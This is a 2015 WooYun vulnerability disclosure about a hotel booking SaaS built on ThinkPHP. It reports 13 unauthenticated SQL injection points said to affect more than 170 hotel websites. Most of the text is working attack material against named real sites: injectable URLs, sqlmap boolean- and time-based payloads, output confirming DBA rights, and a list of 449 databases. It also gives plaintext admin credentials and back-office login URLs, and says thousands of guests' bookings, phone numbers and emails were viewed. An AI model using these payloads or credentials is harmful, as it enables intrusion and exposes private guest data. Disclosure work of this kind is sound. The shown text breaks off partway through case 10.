当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100905

漏洞标题:通用型酒店系统存在10多处高危DBA权限SQL注入漏洞打包

相关厂商:广州市问途信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-03-12 14:07

修复时间:2015-06-15 11:26

公开时间:2015-06-15 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向第三方安全合作伙伴开放
2015-05-11: 细节向核心白帽子及相关领域专家公开
2015-05-21: 细节向普通白帽子公开
2015-05-31: 细节向实习白帽子公开
2015-06-15: 细节向公众公开

简要描述:

RT
波及多个酒店厂商,发现好多土豪
问题蛮严重的,注入点都不需要登陆,所以连注册也省了

详细说明:

名称: 广州市问途信息技术有限公司
使用Thinkphp框架,存在13处SQL注入漏洞,在此打包处理,影响国内170+酒店网站,由于是DBA权限,每个站点都可以搞定449个数据库。包含大量订房姓名、电话、邮箱和备注
通用型通过 WooYun: 一个漏洞沦陷至少全国各地170家酒店及酒店集团(可查开房信息,国庆你还开房吗) 漏洞可以看出,证明里随机选择其中10多个案例。
问题蛮严重的,注入点都不需要登陆,所以连注册也省了

漏洞证明:

0x00 注入点(均不需要登陆)
1.预定到第二步时存在注入漏洞,不需登陆

/saas/Booking/step2/?client_account=qh_hyhj*&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282


2.

/saas/Cms/getInteraction/?client_account=qh_hyhj*&jsoncallback=jQuery18305267729293555021_1425380492266&language=zh-cn&param={"name":"room_comment","page_id":1,"page_size":5}&_=1425380493619


3.

/saas/Guest/getLogin/?client_account=qh_hyhj*&jsoncallback=jQuery18306475855236764582_1425380369592&language=zh-cn&_=1425380371556


4.

/saas/Guest/login/?account_id=18202657883&client_account=qh_hyhj*&jsoncallback=jQuery18306475855236764582_1425380369593&language=zh-cn&password=123456&_=1425380380754


5.

/saas/Guest/logout/?client_account=qh_hyhj*&jsoncallback=jQuery1830018785501597449183_1425380492230&language=zh-cn&_=1425380507975


6.

/saas/Membership/getAllAccountLogs/?client_account=qh_hyhj*&jsoncallback=jQuery183028017582511529326_1425380492184&language=zh-cn&_=1425380544172


7.

/saas/Membership/getGapToUpgrade/?client_account=qh_hyhj*&jsoncallback=jQuery18306475855236764582_1425380369593&language=zh-cn&_=1425380381408


8.

/saas/Membership/getAllMemos/?client_account=qh_hyhj*&jsoncallback=jQuery18306475855236764582_1425380369593&language=zh-cn&_=1425380381108


9.POST请求

POST /saas/Membership/getAllListsAndGifts/?jsoncallback=jQuery183028017582511529326_1425380492184 HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.holliyardhotel.com:80/member.html
Cookie: PHPSESSID=73963b1ti7u2s247qec8k3s6b1
Host: www.holliyardhotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
client_account=qh_hyhj*&code=&language=zh-cn


10.POST请求

POST /saas/Membership/getAllRecords/?jsoncallback=jQuery183028017582511529326_1425380492184 HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.holliyardhotel.com:80/member.html
Cookie: PHPSESSID=73963b1ti7u2s247qec8k3s6b1
Host: www.holliyardhotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
client_account=qh_hyhj*&code=&language=zh-cn


11.POST请求

POST /saas/Membership/getLoginMemberInfo/?jsoncallback=jQuery18306475855236764582_1425380369593 HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.holliyardhotel.com:80/member.html
Host: www.holliyardhotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
client_account=qh_hyhj*&code=&language=zh-cn


12.POST请求

POST /saas/Membership/getOrders/?jsoncallback=jQuery183028017582511529326_1425380492184 HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.holliyardhotel.com:80/member.html
Cookie: PHPSESSID=73963b1ti7u2s247qec8k3s6b1
Host: www.holliyardhotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
client_account=qh_hyhj*&code=&language=zh-cn


13.POST请求

POST /saas/Membership/getRequestOrders/?jsoncallback=jQuery183028017582511529326_1425380492184 HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.holliyardhotel.com:80/member.html
Cookie: PHPSESSID=73963b1ti7u2s247qec8k3s6b1
Host: www.holliyardhotel.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
client_account=qh_hyhj*&code=&language=zh-cn


0x01 SQL注入到后台
测试发现使用数据库都是名为dossm的数据库,而且存在后台账户的表都为tbl_user
案例1.http://www.hotelsjianguo.com/ 北京的首旅建国酒店集团
http://www.btghotels.com/saas/Booking/step2/?client_account=qh_hyhj*&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282
查看tbl_user表,得到一账户

jg.jpg


用户名regina.wong
密码AA20034343@BB
http://be.hotelsjianguo.com/Order/orderManage到这里登陆
登陆后,发现问题很严重,2000+的订单信息泄露

jg1.jpg


包括开房姓名、手机号、邮箱等敏感信息

jg2.jpg


下面这张图体现出来是个集团

jg3.jpg


波及449个数据库:

available databases [449]:
[*] `dossm-help`
[*] `dossm_pay_v1.5`
[*] base_pay_tmpl1
[*] base_pay_tmpl15
[*] basepay_tmpl2_v15
[*] basepay_tmpl3_v15
[*] basepay_wap_tmplv10
[*] bc_group
[*] bc_group_cy
[*] bdh_lyy
[*] beifangyishang_new
[*] bf_norinco_easun
[*] bj_dytmgm
[*] bj_jsxr
[*] bj_jxyhotel
[*] bj_ktjh
[*] bj_wlylzs
[*] bj_xsfd
[*] bj_xyfd
[*] bj_ywhy_beiqing
[*] bj_ywhy_huayuan
[*] blog_royalhotels
[*] btg_gufen
[*] btg_gufen_test
[*] btg_jg_test
[*] btg_jg_test1107
[*] btg_jianguo
[*] btg_jianguo0728
[*] btg_member
[*] btg_shoulv
[*] cd_dyt
[*] cd_dytmgm
[*] cd_dytmgm_co
[*] cd_hjthw
[*] cd_ldhotel
[*] cd_rxgroup
[*] cd_rxhotel
[*] cd_tfsunshine
[*] cd_yghotel
[*] cd_yhwc_new
[*] cq_hb
[*] cs_jy_group
[*] cs_tc_group
[*] cs_zjhy
[*] cstc_test
[*] cz_fjyg
[*] cz_fjyghotel
[*] cz_fjyghotel_1208
[*] cz_hotel
[*] cz_jzhy_v15
[*] cz_yigao
[*] D1_xm_ljhotel
[*] d2
[*] d2_bdhlyy
[*] d2_bjjxy
[*] d2_bjlzs
[*] d2_bjywbq
[*] d2_bjywhy
[*] d2_btg_gufen_0119
[*] d2_btg_jianguo
[*] d2_czjzhy
[*] d2_demo
[*] d2_demo_group
[*] d2_demo_group0105
[*] d2_demo_group_0819
[*] d2_demo_pay
[*] d2_dg_dhhy
[*] d2_dosm_pay
[*] d2_dossm_pay
[*] d2_dossm_pay_group
[*] d2_dossmpay_group
[*] d2_gdyzwh
[*] d2_gzjlbh
[*] d2_gzkrd
[*] d2_gzlbgj
[*] d2_gzmlz
[*] d2_gzmqj
[*] d2_gzmqj_0
[*] d2_gzxyx
[*] d2_hhhtjr
[*] d2_hn_xt_group
[*] d2_jg
[*] d2_jhhmd
[*] d2_lzhlhotel
[*] d2_lzhonglou
[*] d2_pay
[*] d2_pay_demo
[*] d2_pay_nc
[*] d2_pay_tmpl1v15
[*] d2_pay_tmpl2v15
[*] d2_pay_tmpl3v15
[*] d2_sales
[*] d2_sales_pay
[*] d2_sdlyfl
[*] d2_shlndf
[*] d2_show_pay
[*] d2_sybh
[*] d2_syzyhotel
[*] d2_szqss
[*] d2_wdsgdh
[*] d2_wintour_group
[*] d2_xjzmhf
[*] dalian_plh_new
[*] demo2_2_new_new
[*] demo2_inn
[*] demo3
[*] demo3_v10
[*] demo_api_v1
[*] demo_group
[*] demo_inn
[*] demo_pay
[*] demo_pay_tmpl15
[*] demopay_tmpl2_v15
[*] demopay_tmpl3_v15
[*] demopay_wap_tmpl1v10
[*] dev_api_v1
[*] devgrouppay_wap_tmpl1v10
[*] devpay_tmpl2_v15
[*] devpay_tmpl3_v15
[*] devpay_wap_tmpl1v10
[*] dg_eurasia_new
[*] dg_hedhotel
[*] dg_rhm
[*] dg_rhm_new
[*] dg_ybghotel
[*] dg_yihao
[*] dl_hwhotel
[*] dl_xhjr
[*] dossm
[*] dossm_apps
[*] dossm_backup
[*] dossm_inn
[*] dossm_pay
[*] dossm_pay_group
[*] dossm_pay_group_tmpl1
[*] dotproject
[*] ds_group
[*] ecshop
[*] eecshop
[*] example_1_new
[*] example_2_new
[*] example_3_new
[*] example_4
[*] fj_xhhotel
[*] fs_bdgjgy
[*] fs_goldensun
[*] fz_ytxml
[*] gd_aihotel
[*] gd_yzwh
[*] gl_07732283388
[*] gl_07733676966
[*] gl_gshx
[*] gl_hotel
[*] gufen_test
[*] gz_02037088168
[*] gz_02037871888
[*] gz_02062652907
[*] gz_02066846006
[*] gz_aoyuangroup
[*] gz_bdhotel
[*] gz_dfgj
[*] gz_dsjhhotel
[*] gz_dslc
[*] gz_dzh_new
[*] gz_gsly_firm
[*] gz_gsly_group
[*] gz_gygg
[*] gz_hjd_new
[*] gz_hrcworldwide
[*] gz_hsyh_new
[*] gz_hxgj
[*] gz_hxgj_0103
[*] gz_hynh
[*] gz_jg_new
[*] gz_jhhmd
[*] gz_jlbh
[*] gz_js_new
[*] gz_js_pay
[*] gz_jzh
[*] gz_krd
[*] gz_ky
[*] gz_lbgjhotel
[*] gz_lido
[*] gz_marina_new
[*] gz_mjdjc
[*] gz_mlzhotel
[*] gz_nzhotel
[*] gz_pybg
[*] gz_ramada
[*] gz_rghotel
[*] gz_smg
[*] gz_sunshine
[*] gz_victoria
[*] gz_wgs
[*] gz_wgwq
[*] gz_wngj
[*] gz_wxy
[*] gz_xhwq
[*] gz_xlhhotel
[*] gz_xsgj
[*] gz_xsshg
[*] gz_xyx
[*] gz_ybg
[*] gz_yhss
[*] gz_yljr
[*] gz_yljrhotel
[*] gz_ysdd
[*] gz_ysdd_new
[*] gz_ysddhotel
[*] gz_ythotle
[*] gz_yybg_new
[*] gzwintour
[*] haiwan_01
[*] haiwan_02
[*] haiwan_03
[*] haiwan_04
[*] hd_kywq
[*] heb_bst
[*] hebs_2_new
[*] hebs_3_new
[*] hebs_4_new
[*] hhht_jrhotel
[*] hlj_bdh
[*] hn_18789853568
[*] hn_fwmnk
[*] hn_hy
[*] hn_skyland
[*] hn_skyland1117
[*] hn_tdhotel
[*] hn_xgbg_new
[*] hn_xt_group_1104
[*] hn_xtgroup
[*] hn_xtgroup_0430test
[*] hn_ytwq
[*] hrc_dzh_new
[*] hrc_gzhotel
[*] hrc_meeting
[*] hy_lyhotel
[*] hy_xfhotel
[*] hy_ylmhotel
[*] hz_dzyhotel
[*] hz_hongxing
[*] hz_hongxing_new_new
[*] information_schema
[*] jggroup_test
[*] jggroup_test2_nc
[*] jggroup_test_nc
[*] jianguo_test
[*] js_xgwhotel
[*] junting_group
[*] km_jqhotel
[*] lik
[*] lllllll
[*] ln_tltx
[*] ln_tltxhotel
[*] ly_hklv_group
[*] lz_hlbg
[*] lz_jdhotel
[*] mlzg
[*] mysql
[*] mz_whhotel
[*] nc_jywq
[*] nc_jywq_test
[*] nc_jywqhotel
[*] ns_ayys
[*] nt_wffd
[*] pay_test
[*] pds_fxhg
[*] qc_hshotel
[*] qh_heyue_new
[*] qh_tfyhotel
[*] qh_xda
[*] radius
[*] rg_jljd
[*] rg_jljdhotel
[*] sam
[*] sd_lyfl
[*] sd_lzc
[*] sd_lzc_group
[*] sd_zb_new
[*] sh_bcgroup
[*] sh_hsdjc
[*] sh_jybj
[*] sh_lndf
[*] sh_wyndham_group
[*] sh_wyndham_group_0228
[*] sh_wyndham_group_temp
[*] sh_yhhotel
[*] sh_ysd
[*] sh_yt_wap
[*] sh_ytgroup
[*] ss_lhwq
[*] ss_lvhuwq
[*] sy_089838219999
[*] sy_089838276388
[*] sy_089838295929
[*] sy_089838873111
[*] sy_089888252558
[*] sy_089888273798
[*] sy_089888297773
[*] sy_089888357600
[*] sy_089888385566
[*] sy_089888390998
[*] sy_089888397533
[*] sy_089888883188
[*] sy_13700491119
[*] sy_18608955678
[*] sy_18689901001
[*] sy_18976697773
[*] sy_4006807060
[*] sy_4007256688
[*] sy_bh_new_8_22
[*] sy_bhhotel
[*] sy_brhj
[*] sy_brjp
[*] sy_cfhw
[*] sy_fcghotel_new
[*] sy_ffsc
[*] sy_golfclub
[*] sy_hjhj
[*] sy_iaegean_new
[*] sy_jl_10_8
[*] sy_joya
[*] sy_jr
[*] sy_jzl
[*] sy_ljhw
[*] sy_lkgjhotel
[*] sy_margaret
[*] sy_mgmhotel
[*] sy_mgrt
[*] sy_osresort_4_9
[*] sy_qianzhouwan_new1
[*] sy_qngolf
[*] sy_resortintime_new
[*] sy_sxs
[*] sy_tfyhotel
[*] sy_wzs
[*] sy_xinshiji
[*] sy_yhhotel
[*] sy_yy
[*] sy_zhujianghuayuan
[*] sy_zyhotel
[*] sz_18675582773
[*] sz_baolilai
[*] sz_guanyun
[*] sz_gyhotel
[*] sz_kingkey
[*] sz_qsshotel
[*] sz_smwe
[*] sz_smwehotel
[*] sz_sunshinehotel_new
[*] sz_tlh
[*] sz_wj
[*] sz_xd
[*] sz_yangguang
[*] sz_ywl
[*] temp_
[*] tfy_group
[*] tfy_group_0807
[*] tianyu_cbs
[*] tianyu_sanya
[*] tianyu_sy
[*] tj_jw
[*] tlhotel
[*] ty_group
[*] wap_group
[*] wap_group_show
[*] wds_yh
[*] we7
[*] we78
[*] we79
[*] weiqing
[*] weixin_group
[*] wh_ouya_group_new
[*] wh_oyhz
[*] wh_zngarden
[*] wintour
[*] wintour_0
[*] wintour_1
[*] wintour_2
[*] wintour_3
[*] wintour_4
[*] wintour_5
[*] wintour_6
[*] wintour_7
[*] wintour_8
[*] wintour_group
[*] wintour_hebs
[*] wintour_new
[*] wintour_pay
[*] wintour_pms
[*] wintour_test
[*] wintour_weixin
[*] wzs_ytyl
[*] xf_wyh
[*] xf_wyhhotel
[*] xg_ffl
[*] xj_zmhf
[*] xm_bx
[*] xm_bx_group
[*] xm_bxhotel
[*] xm_jf_group
[*] xm_jianfa_group
[*] xm_jianfa_group_0123
[*] xm_jianfa_pay
[*] xm_ljhotel
[*] xm_xlhotel
[*] xm_yeohwahotels
[*] xsgj_wx
[*] yf_kxhotel
[*] yg_blhsly
[*] yh_group_dev
[*] yh_hotel_group
[*] yh_yhhotel
[*] yn_sbgarden_old
[*] yn_tcgf
[*] yn_zhongwei_group
[*] yq_jdhotel
[*] ys_07738777555
[*] ys_07738777789
[*] ys_07738815116
[*] ys_07738818281
[*] ys_07738819706
[*] ys_07738819895
[*] ys_07738826879
[*] ys_07738829388
[*] ys_07738829676
[*] ys_07738883058
[*] ys_07738887260
[*] ys_07738888234
[*] ys_07738888837
[*] ys_13597163030
[*] ys_15678364846
[*] ys_15877002886
[*] ys_15977394521
[*] ys_18677350886
[*] ys_bljj
[*] ys_xhmw
[*] ys_xhmw_group
[*] yt_grouwap
[*] zh_dehan
[*] zh_haiwan
[*] zj_junhao_new
[*] zjj_htj
[*] zjj_sunshine
[*] zjj_sunshinehotel_new
[*] zs_bc
[*] zz_ghhotel
[*] zz_zfhotel


案例2.http://www.btghotels.com/ 首旅酒店,发现首旅酒店主要包括首旅建国、首旅经纶和欣燕都
查看下一个近3000的订单

jg4.jpg


DBA权限

Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.btghotels.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 2593=2593 AND 'hlDO'='hlDO&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5
current user is DBA: True
Database: dossm


案例3.http://www.holliyardhotel.com/

http://www.holliyardhotel.com/saas/Booking/step2/?client_account=qh_hyhj*&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282


http://cms.holliyardhotel.com/Index/index/t/default 这个是cms后台管理界面
Coco.lu|Coco.lu

1.jpg


http://be.holliyardhotel.com/Login/login 用上面账户登录就是订单管理界面了
4000多的订单,土豪啊

2.jpg


还可以跟他做朋友

3.jpg


DBA权限

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.holliyardhotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 7082=7082 AND 'CMQi'='CMQi&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.holliyardhotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'Twam'='Twam&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current user is DBA: True
Database: dossm


案例4.www.sanyaliking.com 三亚丽景海湾

www.sanyaliking.com/saas/Booking/step2/?client_account=qh_hyhj*&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.sanyaliking.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 5134=5134 AND 'sRIk'='sRIk&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.sanyaliking.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'RNNE'='RNNE&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


案例5.www.singwood.com.cn

www.singwood.com.cn/saas/Booking/step2/?client_account=qh_hyhj*&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282


5.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.singwood.com.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND 6482=6482 AND 'SnkH'='SnkH&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.singwood.com.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'DhmV'='DhmV&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


###################下面只证明DBA权限,数据库均为dossm#################################
案例6.http://www.oceanhotel.com.cn/

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.oceanhotel.com.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND 2382=2382 AND 'nJYa'='nJYa&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.oceanhotel.com.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'rYZR'='rYZR&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
current user: 'dOsSM2012@%'
current user is DBA: True


案例7.http://www.aoyuanhealthhotel.com

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.aoyuanhealthhotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 5466=5466 AND 'HUEL'='HUEL&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.aoyuanhealthhotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'KNbL'='KNbL&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current user: 'dOsSM2012@%'
current user is DBA: True


案例8. http://www.xn--sjqu43axxn38f.com

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.xn--sjqu43axxn38f.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 2169=2169 AND 'vhyf'='vhyf&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.xn--sjqu43axxn38f.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'PRNM'='PRNM&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


案例9.http://yalongbaygolfclub.com

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://yalongbaygolfclub.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 1253=1253 AND 'oTvl'='oTvl&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://yalongbaygolfclub.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'CIbI'='CIbI&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


案例10.http://www.wakingtown-hotel.com

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
